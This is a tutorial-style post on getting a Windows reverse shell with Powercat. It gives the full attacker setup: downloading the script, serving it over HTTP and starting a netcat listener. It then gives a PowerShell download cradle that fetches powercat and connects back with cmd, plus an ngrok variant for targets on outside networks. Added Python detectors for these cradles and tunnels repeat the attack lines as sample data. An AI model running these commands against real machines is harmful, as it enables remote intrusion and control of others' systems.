Getting Reverse Shell with Powercat

Image Source: https://github.com/rexpository/powercat-v2.0

Powercat is a PowerShell-based tool that provides the functionality of Netcat, a popular network utility. It can be used to create reverse shells, transfer files, and perform other network-related tasks. Powercat is often used by penetration testers and security researchers to test the security of networks.

Now let’s talk about how to get a reverse shell from the target computer with Powercat. The steps below assume the target is on the same network as you. If you want a reverse shell from a computer on a remote network, you will need to forward the connection from that network to your local machine with the Ngrok tool, which was covered in one of the previous articles.

1- Install a Linux server and download the Powercat script to it. I prefer Kali Linux.

wget https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1

2- Start an HTTP server with Python. The reason is to let the target system download the powercat.ps1 file from our attacker server.

python -m SimpleHTTPServer 80

3- Start a Netcat listener on the port we want. Here I choose port 4444.

What the -vlp parameters do:

  • -v: Print verbose output, which includes information about the connection, such as the remote host and port, the local port, and the data that is being transferred.
  • -l: Listen on a local port, which means that Netcat will wait for a connection from another host.
  • -p: Specify the local port to listen on.

4- Run the following command on the target machine.

PowerShell
powershell -c "IEX (New-Object System.Net.WebClient).DownloadString('http://<Attacker-Linux-IP>/powercat.ps1');powercat -c 172.16.5.127 -p 4444 -e cmd"

After the command runs, switching to the attacker server shows that we have the shell.
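From the defender’s side, the command in step 4 has a recognisable shape in process-creation telemetry: a download cradle (IEX plus DownloadString) followed by powercat connecting back with -e. The Python below is an added example for this post, not part of it and not powercat’s own code; it scans constructed event records whose dict layout (host, user, cmd) stands in for the CommandLine field of Windows 4688 or Sysmon Event ID 1 records, and the attacker addresses in them are made up.

```python
"""Flag PowerShell download cradles and powercat shell invocations in
process-creation telemetry. Added example, not part of the original post and
not powercat's own code. SAMPLE_EVENTS is constructed; the dict shape is a
hypothetical stand-in for the CommandLine field of 4688 / Sysmon ID 1 events."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE_EVENTS = [
    {"host": "WS01", "user": "alice", "cmd": "powershell -c Get-Date"},
    # The pattern from this post, with a constructed attacker IP.
    {"host": "WS01", "user": "alice", "cmd":
     "powershell -c \"IEX (New-Object System.Net.WebClient).DownloadString("
     "'http://10.0.0.5/powercat.ps1');powercat -c 10.0.0.5 -p 4444 -e cmd\""},
    # Same thing lower-cased and routed through constructed ngrok tunnel names.
    {"host": "WS02", "user": "bob", "cmd":
     "powershell -c \"iex (new-object net.webclient).downloadstring("
     "'http://0.tcp.eu.ngrok.io:14567/powercat.ps1');"
     "powercat -c 4.tcp.eu.ngrok.io -p 19876 -e cmd\""},
    # Admin script run from disk: no cradle, no powercat.
    {"host": "WS03", "user": "svc", "cmd":
     "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"},
    # Plain file download without IEX: fetched to disk, not executed in memory.
    {"host": "WS04", "user": "carol", "cmd":
     "powershell -c \"(New-Object System.Net.WebClient).DownloadFile("
     "'http://intranet/tools.zip','C:\\tmp\\t.zip')\""},
    # powercat listening (-l) instead of connecting back: a bind shell.
    {"host": "WS05", "user": "dave", "cmd": "powershell -c \"powercat -l -p 443 -e cmd\""},
]

IEX_RE = re.compile(r"\biex\b|invoke-expression", re.I)
FETCH_RE = re.compile(r"downloadstring\s*\(|invoke-webrequest|invoke-restmethod", re.I)
# "powercat" followed by whitespace, so the URL path powercat.ps1 does not count.
POWERCAT_RE = re.compile(r"\bpowercat\s", re.I)


def _opt(tail: str, flag: str) -> Optional[str]:
    """Value of a powercat switch (-c, -p, -e) in the text after 'powercat'."""
    m = re.search(r"(?:^|\s)-%s\s+([^\s\"']+)" % flag, tail, re.I)
    return m.group(1) if m else None


@dataclass
class Finding:
    host: str
    user: str
    reasons: list = field(default_factory=list)
    remote: Optional[str] = None    # where powercat connects, or the listen port
    executes: Optional[str] = None  # program handed to powercat -e
    severity: str = "medium"


def analyse(event: dict) -> Optional[Finding]:
    """Return a Finding when the command line matches, else None."""
    cmd = event["cmd"]
    f = Finding(event["host"], event["user"])
    # Cradle: something is fetched AND evaluated in memory, in either order.
    if IEX_RE.search(cmd) and FETCH_RE.search(cmd):
        f.reasons.append("download cradle (fetch + in-memory execute)")
    pc = POWERCAT_RE.search(cmd)
    if pc:
        tail = cmd[pc.end():]          # only powercat's own switches live here
        f.executes = _opt(tail, "e")
        target, port = _opt(tail, "c"), _opt(tail, "p")
        if f.executes and target:
            f.reasons.append("powercat reverse shell")
            f.remote = f"{target}:{port or '?'}"
            f.severity = "high"
        elif f.executes and re.search(r"(?:^|\s)-l\b", tail):
            f.reasons.append("powercat bind shell")
            f.remote = f"listen:{port or '?'}"
            f.severity = "high"
        else:
            f.reasons.append("powercat invoked")
    return f if f.reasons else None


def scan(events):
    """Findings for every event that matched, in input order."""
    return [f for f in map(analyse, events) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.host}/{finding.user}: "
              f"{', '.join(finding.reasons)} -> {finding.remote} (-e {finding.executes})")
```

The rule keys on behaviour rather than exact strings: the cradle check needs both an evaluator (IEX / Invoke-Expression) and a fetch (DownloadString, Invoke-WebRequest, Invoke-RestMethod), so the spacing typo in the original command still trips it, while a DownloadFile to disk without IEX does not. Command-line matching is easy to obfuscate, so pair it with PowerShell Script Block Logging (event 4104 in Microsoft-Windows-PowerShell/Operational), which records the script as it was actually executed.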


If you want to do this with a device on an external network, rather than between two devices on the internal network, you can follow the steps below.

First of all, we need a server that is reachable from the outside to receive the connections we send; if you don't have one, you can use ngrok. I explained how to install it in my previous article (Forming Backdoor Payload and Obtaining a Reverse Shell Using Ngrok and Metasploit Framework and How to Protect Yourself from it).

Since one ngrok tunnel gives us only one port, we started a second ngrok tunnel to deliver the powercat.ps1 file to the target.

Controller server’s Ngrok tunnel

The Ngrok tunnel from which we will serve the Powercat file

Final Command

PowerShell
powershell -c "IEX (New-Object System.Net.WebClient).DownloadString('http://X.tcp.eu.ngrok.io:XXX/powercat.ps1');powercat -c Y.tcp.eu.ngrok.io -p YYY -e cmd"

You must enter your own tunnel hostnames and ports in the places I marked X/XXX and Y/YYY.
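The external-network variant leaves a network trace as well: the target resolves two ngrok tunnel hostnames and then connects to each of them on a high, non-standard port. As an added example (not part of the original post), the Python below correlates DNS lookups of *.ngrok.io names with the outbound connections that follow them from the same client. Both logs are constructed; the tab-separated layout is a hypothetical simplification of Zeek-style dns.log and conn.log records, the answered addresses are TEST-NET ranges rather than real ngrok endpoints, and the ngrok.io suffix is the only tunnel domain the script assumes.

```python
"""Correlate DNS lookups of ngrok tunnel hostnames with the outbound
connections that follow them. Added example, not part of the original post.
DNS_LOG and CONN_LOG are constructed; the tab-separated layout is a
hypothetical simplification of Zeek-style dns.log / conn.log records."""
from dataclasses import dataclass
from typing import Optional

# Fields: ts, client, query, answer (constructed; TEST-NET answer addresses)
DNS_LOG = """\
1700000000.10\t10.1.1.20\t0.tcp.eu.ngrok.io\t203.0.113.10
1700000001.40\t10.1.1.20\t4.tcp.eu.ngrok.io\t198.51.100.22
1700000002.00\t10.1.1.21\tintranet.corp.example\t10.1.5.5
"""

# Fields: ts, src, dst, dport, proto (constructed)
CONN_LOG = """\
1700000000.50\t10.1.1.20\t203.0.113.10\t14567\ttcp
1700000001.90\t10.1.1.20\t198.51.100.22\t19876\ttcp
1700000002.30\t10.1.1.21\t10.1.5.5\t443\ttcp
1700000900.00\t10.1.1.22\t203.0.113.10\t14567\ttcp
"""


def tunnel_kind(name: str) -> Optional[str]:
    """'tcp' for N.tcp.<region>.ngrok.io names (the shape this post uses),
    'other' for any other ngrok.io name, None for everything else.
    Only the ngrok.io suffix is assumed here; add other ngrok domains as needed."""
    labels = name.lower().rstrip(".").split(".")
    if labels[-2:] != ["ngrok", "io"]:
        return None
    return "tcp" if "tcp" in labels else "other"


@dataclass
class Alert:
    src: str
    tunnel: str
    kind: str
    dst: str
    dport: int
    lag: float  # seconds between the lookup and the connection


def parse(log: str):
    """Split a tab-separated log into field lists, skipping blank lines."""
    return [line.split("\t") for line in log.splitlines() if line.strip()]


def correlate(dns_log: str, conn_log: str, window: float = 300.0):
    """Pair each ngrok lookup with the first later connection from the same
    client to the answered address within `window` seconds."""
    lookups = []
    for ts, client, query, answer in parse(dns_log):
        kind = tunnel_kind(query)
        if kind:
            lookups.append((float(ts), client, query, kind, answer))
    alerts = []
    for ts, src, dst, dport, _proto in parse(conn_log):
        t = float(ts)
        for lts, client, query, kind, answer in lookups:
            if client == src and answer == dst and 0 <= t - lts <= window:
                alerts.append(Alert(src, query, kind, dst, int(dport), round(t - lts, 2)))
                break
    return alerts


def clients_with_multiple_tunnels(alerts):
    """Clients that reached more than one tunnel: the two-endpoint pattern
    above (one tunnel serving powercat.ps1, one carrying the shell)."""
    seen = {}
    for a in alerts:
        seen.setdefault(a.src, set()).add(a.tunnel)
    return {src: len(t) for src, t in seen.items() if len(t) > 1}


if __name__ == "__main__":
    found = correlate(DNS_LOG, CONN_LOG)
    for a in found:
        print(f"{a.src} -> {a.tunnel} ({a.kind}) {a.dst}:{a.dport} {a.lag}s after lookup")
    print("multiple tunnels:", clients_with_multiple_tunnels(found))
```

The last connection in CONN_LOG (from 10.1.1.22) is deliberately left unmatched: that client never resolved the name, so a DNS-based rule alone misses it. Treat the correlation as one signal and keep a plain allow-list check on destination hostnames (or an egress policy that blocks tunnelling services) beside it.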

